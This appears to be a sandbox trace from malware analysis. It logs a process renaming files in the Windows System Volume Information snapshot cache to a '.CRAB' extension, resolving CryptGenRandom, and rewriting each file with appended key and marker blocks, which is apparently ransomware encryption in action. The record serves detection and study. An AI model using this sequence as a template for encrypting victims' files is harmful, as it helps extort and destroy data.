File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3616 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB, size = 3616 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 1080 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB, size = 1088 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 952 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB, size = 960 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2216 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB, size = 2224 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3624 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB, size = 3632 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 1888 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB, size = 1888 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2216 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB, size = 2224 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3456 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB, size = 3456 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2216 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB, size = 2224 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2048 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB, size = 2048 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2776 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB, size = 2784 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2704 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB, size = 2704 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3216 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB, size = 3216 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2544 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB, size = 2544 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2904 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB, size = 2912 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3448 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB, size = 3456 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB, size = 8 True 1
